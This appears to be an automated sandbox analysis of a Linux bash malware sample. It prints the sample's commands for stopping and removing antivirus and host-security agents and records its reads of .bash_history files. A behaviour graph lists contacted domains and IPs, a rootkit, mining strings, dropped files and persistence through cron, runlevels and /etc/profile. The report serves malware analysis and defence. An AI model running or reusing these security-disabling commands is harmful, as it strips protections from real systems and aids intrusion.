Source: 1EC6U55yrZaegis: rm -f "/etc/runlevels/default/aegis" >/dev/null 2>&1;
Source: 1EC6U55yrZaegis: rm -f "/etc/rc2.d/S80aegis"
Source: 1EC6U55yrZaegis: rm -f "/etc/rc3.d/S80aegis"
Source: 1EC6U55yrZaegis: rm -f "/etc/rc4.d/S80aegis"
Source: 1EC6U55yrZaegis: rm -f "/etc/rc5.d/S80aegis"
Source: 1EC6U55yrZaegis: rm -f "/etc/rc.d/rc2.d/S80aegis"
Source: 1EC6U55yrZaegis: rm -f "/etc/rc.d/rc3.d/S80aegis"
Source: 1EC6U55yrZaegis: rm -f "/etc/rc.d/rc4.d/S80aegis"
Source: 1EC6U55yrZaegis: rm -f "/etc/rc.d/rc5.d/S80aegis"
Source: 1EC6U55yrZaegis: rm -rf /usr/local/aegis/aegis_client
Source: 1EC6U55yrZaegis: rm -rf /usr/local/aegis/aegis_update
Source: 1EC6U55yrZaegis: rm -rf /usr/local/aegis/alihids
Source: 1EC6U55yrZyunsuo: "yunsuo" )
Source: 1EC6U55yrZyunsuo: service yunsuo stop >/dev/null 2>&1
Source: 1EC6U55yrZyunsuo: /etc/init.d/yunsuo stop >/dev/null 2>&1
Source: 1EC6U55yrZyunsuo: rm -f /etc/init.d/yunsuo
Source: 1EC6U55yrZyunsuo: echo y | /usr/local/yunsuo_agent/uninstall >/dev/null 2>&1
Source: 1EC6U55yrZclamd: "clamd" )
Source: 1EC6U55yrZclamd: service clamd stop >/dev/null 2>&1
Source: 1EC6U55yrZclamd: /etc/init.d/clamd stop >/dev/null 2>&1
Source: 1EC6U55yrZclamav: yum -y remove clamav * >/dev/null 2>&1
Source: 1EC6U55yrZclamav: dpkg -remove clamav * >/dev/null 2>&1
Source: 1EC6U55yrZclamav: dpkg --remove clamav * >/dev/null 2>&1
Source: 1EC6U55yrZclamav: dpkg -remove `dpkg -l | grep clamav | awk '{print $2}'` >/dev/null 2>&1
Source: 1EC6U55yrZclamav: dpkg --remove `dpkg -l | grep clamav | awk '{print $2}'` >/dev/null 2>&1
Source: 1EC6U55yrZavast: "avast" )
Source: 1EC6U55yrZavast: service avast stop >/dev/null 2>&1
Source: 1EC6U55yrZavast: /etc/init.d/avast stop >/dev/null 2>&1
Source: 1EC6U55yrZavast: rpm -e avast >/dev/null 2>&1
Source: 1EC6U55yrZavast: dpkg -remove avast * >/dev/null 2>&1
Source: 1EC6U55yrZavast: dpkg --remove avast * >/dev/null 2>&1
Source: 1EC6U55yrZavast: dpkg -remove `dpkg -l | grep avast | awk '{print $2}'` >/dev/null 2>&1
Source: 1EC6U55yrZavast: dpkg --remove `dpkg -l | grep avast | awk '{print $2}'` >/dev/null 2>&1
Source: 1EC6U55yrZavgd: "avgd" )
Source: 1EC6U55yrZavgd: service avgd stop >/dev/null 2>&1
Source: 1EC6U55yrZavgd: /etc/init.d/avgd stop >/dev/null 2>&1
Source: 1EC6U55yrZavgd: rpm -e avgd >/dev/null 2>&1
Source: 1EC6U55yrZcmdavd: "cmdavd" )
Source: 1EC6U55yrZcmdavd: service cmdavd stop >/dev/null 2>&1
Source: 1EC6U55yrZcmdmgd: service cmdmgd stop >/dev/null 2>&1
Source: 1EC6U55yrZcmdavd: /etc/init.d/cmdavd stop >/dev/null 2>&1
Source: 1EC6U55yrZcmdmgd: /etc/init.d/cmdmgd stop >/dev/null 2>&1
Source: 1EC6U55yrZcmdmgd: "cmdmgd" )
Source: 1EC6U55yrZdrweb-configd: "drweb-configd" )
Source: 1EC6U55yrZdrweb-spider-kmod: service drweb-spider-kmod stop >/dev/null 2>&1
Source: 1EC6U55yrZdrweb-configd: service drweb-configd stop >/dev/null 2>&1
Source: 1EC6U55yrZdrweb-spider-kmod: /etc/init.d/drweb-spider-kmod stop >/dev/null 2>&1
Source: 1EC6U55yrZdrweb-configd: /etc/init.d/drweb-configd stop >/dev/null 2>&1
Source: 1EC6U55yrZdrweb-spider-kmod: "drweb-spider-kmod" )
Source: 1EC6U55yrZesets: "esets" )
Source: 1EC6U55yrZesets: service esets stop >/dev/null 2>&1
Source: 1EC6U55yrZesets: /etc/init.d/esets stop >/dev/null 2>&1
Source: 1EC6U55yrZxmirrord: "xmirrord" )
Source: 1EC6U55yrZxmirrord: service xmirrord stop >/dev/null 2>&1
Source: 1EC6U55yrZxmirrord: /etc/init.d/xmirrord stop >/dev/null 2>&1

Stealing of Sensitive Information:

barindex
Sample reads from .bash_historyShow sources
Source: /bin/cat (PID: 21815)File: /root/.bash_history
Source: /bin/cat (PID: 21831)File: /home/user/.bash_history
Source: /bin/cat (PID: 21842)File: /home/user/.bash_history
Source: /bin/cat (PID: 21865)File: /home/user/.bash_history
Source: /bin/cat (PID: 21886)File: /root/.bash_history
Source: /bin/cat (PID: 21908)File: /root/.bash_history


Runtime Messages

Command:bash "/tmp/1EC6U55yrZ"
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Standard Error:

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 901718 Sample: 1EC6U55yrZ Startdate: 02/07/2019 Architecture: LINUX Score: 100 105 auth.to0ls.com 185.234.218.40, 36876, 36878, 36880 unknown Poland 2->105 107 vpn.to0ls.com 185.234.218.247, 443 unknown Poland 2->107 109 3 other IPs or domains 2->109 111 Detected Linux Brootkit rootkit 2->111 113 Sample contains AV-related strings 2->113 115 Found strings related to Crypto-Mining 2->115 117 Found strings indicative of a multi-platform dropper 2->117 10 bash nohup bash ssh ssh ssh 2->10         started        13 systemd lvm2-activation-generator install.sh 2->13         started        16 systemd systemd-fstab-generator 2->16         started        18 10 other processes 2->18 signatures3 process4 file5 77 /tmp/.helpdd, ASCII 10->77 dropped 79 /etc/rc.local, ASCII 10->79 dropped 81 /etc/init.d/diskmanagerd, POSIX 10->81 dropped 83 2 other malicious files 10->83 dropped 20 bash nohup sh 10->20         started        22 bash update-rc.d 10->22         started        24 bash 10->24         started        34 185 other processes 10->34 133 Sample reads /proc/mounts (often used for finding a writable filesystem) 13->133 27 install.sh cp 13->27         started        30 install.sh chmod 13->30         started        32 install.sh rm 13->32         started        36 87 other processes 13->36 signatures6 process7 file8 38 sh 20->38         started        40 sh 20->40         started        42 sh 20->42         started        52 46 other processes 20->52 44 update-rc.d insserv 22->44         started        48 update-rc.d systemctl 22->48         started        119 Drops files in suspicious directories 24->119 121 Sample tries to persist itself using cron 24->121 123 Sample tries to persist itself using System V runlevels 24->123 85 /etc/profile.d/emacs.sh, Bourne-Again 27->85 dropped 125 Sample tries to persist itself using /etc/profile 27->125 127 Sets full permissions to files and/or directories 30->127 129 Sample deletes itself 32->129 87 /tmp/.../install.sh, Bourne-Again 34->87 dropped 89 /usr/lib/.../diskmanagerd, Bourne-Again 34->89 dropped 91 /tmp/.../brootkit.sh, Bourne-Again 34->91 dropped 93 /lib/libterminfo.so, Bourne-Again 34->93 dropped 50 bash dd 34->50         started        54 306 other processes 34->54 95 /usr/include/.../brootkit.sh, Bourne-Again 36->95 dropped 56 168 other processes 36->56 signatures9 process10 file11 58 sh 38->58         started        61 sh 38->61         started        63 sh 40->63         started        65 sh